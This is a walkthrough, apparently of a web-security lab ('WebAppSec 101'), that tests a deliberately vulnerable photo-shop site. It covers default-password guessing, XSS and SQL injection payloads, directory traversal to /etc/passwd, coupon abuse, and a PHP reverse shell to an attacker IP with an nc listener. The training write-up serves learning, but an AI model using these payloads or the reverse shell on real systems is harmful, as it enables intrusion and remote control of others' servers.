[Task 1] Basic Description & Objectives
[Task 2] Walking through the application
– What version of Apache is being used?
– What language was used to create the website?
– What version of this language is used?
Let’s do the information gathering first.
1. Test web functionality
2. Home section → malicious file upload
![](https://miro.medium.com/max/1205/1*yMgcutLWPQtLpIDQbtv8VA.png)
![](https://miro.medium.com/max/1205/1*yMgcutLWPQtLpIDQbtv8VA.png)
3. Home section — search → SQL injection, XSS
![](https://miro.medium.com/max/1276/1*p5G-1dfzY2wCAZY38YHf-g.png)
![](https://miro.medium.com/max/1276/1*p5G-1dfzY2wCAZY38YHf-g.png)
![](https://miro.medium.com/max/1213/1*GjOoSWDeznA-vC9EXXsnUw.png)
![](https://miro.medium.com/max/1213/1*GjOoSWDeznA-vC9EXXsnUw.png)
4. Home section — create account → SQL Injection
I fill every text box with “test”.
![](https://miro.medium.com/max/1213/1*bUGjA5oc523BzBUNrgSIEQ.png)
![](https://miro.medium.com/max/1213/1*bUGjA5oc523BzBUNrgSIEQ.png)
![](https://miro.medium.com/max/1193/1*Ptku30Vy8uKYCk-hAh0YQw.png)
![](https://miro.medium.com/max/1193/1*Ptku30Vy8uKYCk-hAh0YQw.png)
It seems like I logged in with user “test”.
5. Test similar name function
![](https://miro.medium.com/max/1215/1*VbzHlAg8igmy2klwjfkhrw.png)
![](https://miro.medium.com/max/1215/1*VbzHlAg8igmy2klwjfkhrw.png)
6. Your uploaded pics
![](https://miro.medium.com/max/1199/1*VTLIz5Tp8YDlx1bquF3lQg.png)
![](https://miro.medium.com/max/1199/1*VTLIz5Tp8YDlx1bquF3lQg.png)
7. Your purchased pics
![](https://miro.medium.com/max/1196/1*wC63eHWTZzpX8y8HJ08zxA.png)
![](https://miro.medium.com/max/1196/1*wC63eHWTZzpX8y8HJ08zxA.png)
8. Back to create account section — Let’s test for password strength → command injection
![](https://miro.medium.com/max/1211/1*Exw3ETxnuyLvQdKxHfAj5A.png)
![](https://miro.medium.com/max/1211/1*Exw3ETxnuyLvQdKxHfAj5A.png)
![](https://miro.medium.com/max/1200/1*ebyE-8jAGn7210xqRJ6dcA.png)
![](https://miro.medium.com/max/1200/1*ebyE-8jAGn7210xqRJ6dcA.png)
![](https://miro.medium.com/max/1214/1*TGAldmTm08HbBiFKsJr6ug.png)
![](https://miro.medium.com/max/1214/1*TGAldmTm08HbBiFKsJr6ug.png)
9. Check out sample user → Broken Access Control
![](https://miro.medium.com/max/1196/1*FOjOPQvNuuSNUy21Djs3xQ.png)
![](https://miro.medium.com/max/1196/1*FOjOPQvNuuSNUy21Djs3xQ.png)
![](https://miro.medium.com/max/1456/1*6i-Uglga-bjz09gbUXyWYQ.png)
![](https://miro.medium.com/max/1456/1*6i-Uglga-bjz09gbUXyWYQ.png)
10. Check out what is going on today
![](https://miro.medium.com/max/1196/1*i5PT-UNns2T9Ic1ABpDYIQ.png)
![](https://miro.medium.com/max/1196/1*i5PT-UNns2T9Ic1ABpDYIQ.png)
Click what about tomorrow until there’s is a coupon code.
![](https://miro.medium.com/max/1203/1*C5GSZ5TkUm1IqtWyPqKhUA.png)
![](https://miro.medium.com/max/1203/1*C5GSZ5TkUm1IqtWyPqKhUA.png)
![](https://miro.medium.com/max/1203/1*C5GSZ5TkUm1IqtWyPqKhUA.png)
![](https://miro.medium.com/max/1203/1*C5GSZ5TkUm1IqtWyPqKhUA.png)
![](https://miro.medium.com/max/1203/1*C5GSZ5TkUm1IqtWyPqKhUA.png)
![](https://miro.medium.com/max/1203/1*C5GSZ5TkUm1IqtWyPqKhUA.png)
11. Check upload section
Login first
![](https://miro.medium.com/max/1000/1*wpzvDXDiIWuIa5gagKDwJw.png)
![](https://miro.medium.com/max/1000/1*wpzvDXDiIWuIa5gagKDwJw.png)
It’s the same page as we visited before.
![](https://miro.medium.com/max/1000/1*K4ZtuRsFYNnkT1QfSf6smQ.png)
![](https://miro.medium.com/max/1000/1*K4ZtuRsFYNnkT1QfSf6smQ.png)
12. Check recent section
![](https://miro.medium.com/max/1000/1*ffFraAqoFqq91vjGCB4tSg.png)
![](https://miro.medium.com/max/1000/1*ffFraAqoFqq91vjGCB4tSg.png)
13. Check guestbook section → XSS
![](https://miro.medium.com/max/1000/1*THS3JJG4ke4gcanMuWBDiA.png)
![](https://miro.medium.com/max/1000/1*THS3JJG4ke4gcanMuWBDiA.png)
14. Check cart section
![](https://miro.medium.com/max/1000/1*cm2npmnqJLSV0XbGjqh8gg.png)
![](https://miro.medium.com/max/1000/1*cm2npmnqJLSV0XbGjqh8gg.png)
View some picture and buy it
![](https://miro.medium.com/max/1000/1*jq7_v9tTHXw7kZT4AguV1Q.png)
![](https://miro.medium.com/max/1000/1*jq7_v9tTHXw7kZT4AguV1Q.png)
![](https://miro.medium.com/max/1000/1*GToc-VoiY17tlKmTSrWEKQ.png)
![](https://miro.medium.com/max/1000/1*GToc-VoiY17tlKmTSrWEKQ.png)
![](https://miro.medium.com/max/1000/1*d7BS5aErWnPVtN1t0QQe2w.png)
![](https://miro.medium.com/max/1000/1*d7BS5aErWnPVtN1t0QQe2w.png)
![](https://miro.medium.com/max/1000/1*mL99cH552Dfy8b9EfNT5cA.png)
![](https://miro.medium.com/max/1000/1*mL99cH552Dfy8b9EfNT5cA.png)
15. Let’s view the bottom section → Password guessing, Brute-forcing, SQL injection
Admin
![](https://miro.medium.com/max/758/1*PEh83kS5PC-VEop0S13IJw.png)
![](https://miro.medium.com/max/758/1*PEh83kS5PC-VEop0S13IJw.png)
Contact
Terms of service
![](https://miro.medium.com/max/1215/1*_DkCsFWulP09rqSQtthq4Q.png)
![](https://miro.medium.com/max/1215/1*_DkCsFWulP09rqSQtthq4Q.png)
16. Search web paths with dirbuster
Results — I visited every links, but the links aren’t interesting.
![](https://miro.medium.com/max/973/1*9VROqNI1PeEyslah7ZqUUg.png)
![](https://miro.medium.com/max/973/1*9VROqNI1PeEyslah7ZqUUg.png)
17. Search site’s vulnerabilities and information.
nikto -h http://10.10.92.34/
![](https://miro.medium.com/max/1751/1*uvSTBpuKj-_SSwhT2w9sWg.png)
![](https://miro.medium.com/max/1751/1*uvSTBpuKj-_SSwhT2w9sWg.png)
18. Answer the questions
– What version of Apache is being used? 2.4.7
– What language was used to create the website? PHP
– What version of this language is used? 5.5.9
Conclusion
There’ re potential vulnerabilities:
1. Malicious file upload
2. SQL injection,
3. XSS
4. Command injection
5. Broken Access Control
6. Password guessing
7. Brute-forcing
[Task 3] Establishing a methodology
[Task 4] Authentication
– What is the admin username?
– What is the admin password?
– What is the name of the cookie that can be manipulated?
– What is the username of a logged on user?
– What is the corresponding password to the username?
- Let’s try guessing admin username and password. There’ re 4 combinations that I can think of:
– admin: admin
-admin:password
-root:root
-root:password - Let’s login in Login Panel
None of the combinations worked
![](https://miro.medium.com/max/1204/1*A3aZf45l21gQzSf0CshWPg.png)
![](https://miro.medium.com/max/1204/1*A3aZf45l21gQzSf0CshWPg.png)
3. Let’s login in Admin Panel
Luckily “admin : admin” worked
![](https://miro.medium.com/max/509/1*4G-LtMU2JAndby37HwP4SA.png)
![](https://miro.medium.com/max/509/1*4G-LtMU2JAndby37HwP4SA.png)
Although, I clicked “Create a new user!”, but nothing worked.
![](https://miro.medium.com/max/793/1*sz4Ocx_jXlnkpp4X42bK_g.png)
![](https://miro.medium.com/max/793/1*sz4Ocx_jXlnkpp4X42bK_g.png)
![](https://miro.medium.com/max/1566/1*zDPeZaP0jC5r4KvUvy6bJA.png)
![](https://miro.medium.com/max/1566/1*zDPeZaP0jC5r4KvUvy6bJA.png)
To answer the question
-What is the admin username? admin
– What is the admin password? admin
4. Let’s try to find the cookie.
Back to home page
![](https://miro.medium.com/max/1238/1*Wy-Sy7dlTfvSjBXEv3UNGQ.png)
![](https://miro.medium.com/max/1238/1*Wy-Sy7dlTfvSjBXEv3UNGQ.png)
Inspect Element
![](https://miro.medium.com/max/359/1*Fjhx70M10XcuRGk_YqoL-A.png)
![](https://miro.medium.com/max/359/1*Fjhx70M10XcuRGk_YqoL-A.png)
In console tab, type
alert(document.cookie)
![](https://miro.medium.com/max/751/1*_MVuaPwDGp82JhviKAv6iA.png)
![](https://miro.medium.com/max/751/1*_MVuaPwDGp82JhviKAv6iA.png)
There’s PHPSESSID, but it’s the wrong answer.
![](https://miro.medium.com/max/494/1*xbL3G-DpD-20W2b6SrEfZg.png)
![](https://miro.medium.com/max/494/1*xbL3G-DpD-20W2b6SrEfZg.png)
Let’s try the method again in admin panel.
![](https://miro.medium.com/max/1274/1*dDBkZbeLuOH9IDHkv3UQGA.png)
![](https://miro.medium.com/max/1274/1*dDBkZbeLuOH9IDHkv3UQGA.png)
To answer the question
-What is the name of the cookie that can be manipulated? session
5. Let’s access other user data
Click “Check out a sample user!”
![](https://miro.medium.com/max/629/1*azr-0VcNcwCGTUrajHpFkw.png)
![](https://miro.medium.com/max/629/1*azr-0VcNcwCGTUrajHpFkw.png)
Try to break access control by manipulating parameter
![](https://miro.medium.com/max/821/1*6rcKGILF1mez7_AtQUSrMA.png)
![](https://miro.medium.com/max/821/1*6rcKGILF1mez7_AtQUSrMA.png)
These pictures are potential users
-Bob
-scanner1
-scanner2
-scanner3
![](https://miro.medium.com/max/633/1*K7z_cp5zwVyT4HKALHGXfg.png)
![](https://miro.medium.com/max/633/1*K7z_cp5zwVyT4HKALHGXfg.png)
-scanner4
![](https://miro.medium.com/max/659/1*Z15IutPLaAuxD7hL0MLS-A.png)
![](https://miro.medium.com/max/659/1*Z15IutPLaAuxD7hL0MLS-A.png)
-scanner5
![](https://miro.medium.com/max/610/1*5GCYzBVLjEcLNmAqxWm1GA.png)
![](https://miro.medium.com/max/610/1*5GCYzBVLjEcLNmAqxWm1GA.png)
-wanda
![](https://miro.medium.com/max/555/1*Acc67BNFUN8lQn5_pYhpJg.png)
![](https://miro.medium.com/max/555/1*Acc67BNFUN8lQn5_pYhpJg.png)
-calvinwatters
![](https://miro.medium.com/max/618/1*uO_EXVV9DfbrWftwDa1MGQ.png)
![](https://miro.medium.com/max/618/1*uO_EXVV9DfbrWftwDa1MGQ.png)
-bryce
I tried userid 12 and 13, but it’s the empty page. I’ll stop listing users method for now.
As a conclusion, there’re 9 potential users. I’ll try password guessing first by this list:
Bob → Bob:Bob, bob:bob
scanner1 → scanner1:scanner1
scanner2 → scanner2:scanner2
scanner3 → scanner3:scanner3
scanner4 → scanner4:scanner4
scanner5 → scanner5:scanner5
wanda → wanda:wanda
calvinwatters → calvinwatters:calvinwatters
bryce → bryce: bryce
Luckily, I can logged in with bryce:bryce
To answer the question
– What is the username of a logged on user? bryce
– What is the corresponding password to the username? bryce
[Task 5] Cross Site Scripting (XSS)
I used cheat sheet from https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
<iframe src="javascript:alert(1)">
- Test for XSS on the search bar
2. Test for XSS on the guestbook page
Name: <iframe src=”javascript:alert(1)”>
Comment: test
not work
Let’s try again
Name: test
Comment: <iframe src=”javascript:alert(1)”>
3. Test for XSS behind the flash form on the home page → I skipped this due to flash player is turned off.
[Task 6] Injection
– Perform command injection on the check password field
– Check for SQLi on the application
- Perform command injection on the check password field — I skipped this due to when I perform the injection, the machine will break itself.
- Check for SQLi on the application
In login page put
' or 1=1--
not work though
Let’s try in register an account
works!!!
[Task 7] Miscellaneous & Logic Flaws
-Find a parameter manipulation vulnerability
-Find a directory traversal vulnerability
-Find a forceful browsing vulnerability
-Logic flaw: try get an item for free
- Find a parameter manipulation vulnerability
— already done in Task 4 number 5 - Find a directory traversal vulnerability
In upload a picture, I type command and upload some files.
../etc/passwd
![](https://miro.medium.com/max/523/1*mBqgMPoGS-WICJC6sMTkuw.png)
![](https://miro.medium.com/max/523/1*mBqgMPoGS-WICJC6sMTkuw.png)
Now, I get the path
![](https://miro.medium.com/max/1093/1*nlaLvNhy29ocbXztbMtK9w.png)
![](https://miro.medium.com/max/1093/1*nlaLvNhy29ocbXztbMtK9w.png)
Let’s type
http://<ip>/upload/
![](https://miro.medium.com/max/670/1*NP4oQdxqDu_OpbA6Jn9N9g.png)
![](https://miro.medium.com/max/670/1*NP4oQdxqDu_OpbA6Jn9N9g.png)
Try to upload reverse shell
Here’s my php reverse shell
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.8.21.124/1234 0>&1'");?>
Upload it
![](https://miro.medium.com/max/690/1*_6onbdFihwl_9HD3eV_ROw.png)
![](https://miro.medium.com/max/690/1*_6onbdFihwl_9HD3eV_ROw.png)
Success uploading
![](https://miro.medium.com/max/859/1*MNRrBm1ULmceryCarPsvng.png)
![](https://miro.medium.com/max/859/1*MNRrBm1ULmceryCarPsvng.png)
Check in /upload
![](https://miro.medium.com/max/654/1*o79oEvTPE-fGaCXAqBK9jg.png)
![](https://miro.medium.com/max/654/1*o79oEvTPE-fGaCXAqBK9jg.png)
![](https://miro.medium.com/max/776/1*oZpYCJtcLK5IM_s8K4O9kg.png)
![](https://miro.medium.com/max/776/1*oZpYCJtcLK5IM_s8K4O9kg.png)
Back to attacker’s machine
nc -lvp 1234
Click on the file
![](https://miro.medium.com/max/760/1*kyowloImLSItrqdh662jpQ.png)
![](https://miro.medium.com/max/760/1*kyowloImLSItrqdh662jpQ.png)
Back to attacker’s machine, now we have a shell
![](https://miro.medium.com/max/945/1*YAO3-K20s1yQWusatkXy3w.png)
![](https://miro.medium.com/max/945/1*YAO3-K20s1yQWusatkXy3w.png)
3. Find a forceful browsing vulnerability
Try to buy some image
![](https://miro.medium.com/max/1274/1*zLvpxvlzeFt0mv4xDrz-dQ.png)
![](https://miro.medium.com/max/1274/1*zLvpxvlzeFt0mv4xDrz-dQ.png)
Before purchasing it, users can access high quality image
![](https://miro.medium.com/max/1201/1*L9aP1bOL_JoS7Y4qHThIVg.png)
![](https://miro.medium.com/max/1201/1*L9aP1bOL_JoS7Y4qHThIVg.png)
4. Logic flaw: try get an item for free
In home section, click What is going on today?
![](https://miro.medium.com/max/538/1*OFs9qVD7lhfujT5GMYZyIQ.png)
![](https://miro.medium.com/max/538/1*OFs9qVD7lhfujT5GMYZyIQ.png)
Click What about tomorrow? until I have coupon code : SUPERYOU21
![](https://miro.medium.com/max/494/1*WQezWFAKSd4nUvSWBS-2sg.png)
![](https://miro.medium.com/max/494/1*WQezWFAKSd4nUvSWBS-2sg.png)
Back to the cart. Try to apply coupon twice
![](https://miro.medium.com/max/738/1*IFXJK3PsWwlkfxJ5QaaAuw.png)
![](https://miro.medium.com/max/738/1*IFXJK3PsWwlkfxJ5QaaAuw.png)
Apply until I don’t have to pay
![](https://miro.medium.com/max/621/1*F-C0n9IBkI8Qujtm6f9Qkg.png)
![](https://miro.medium.com/max/621/1*F-C0n9IBkI8Qujtm6f9Qkg.png)
![](https://miro.medium.com/max/649/1*5G6COwT4ni6DCXYc8rgXug.png)
![](https://miro.medium.com/max/649/1*5G6COwT4ni6DCXYc8rgXug.png)
This all THANKS
未经允许不得转载:萌萌guo angline - Apprentissage » WebAppSec 101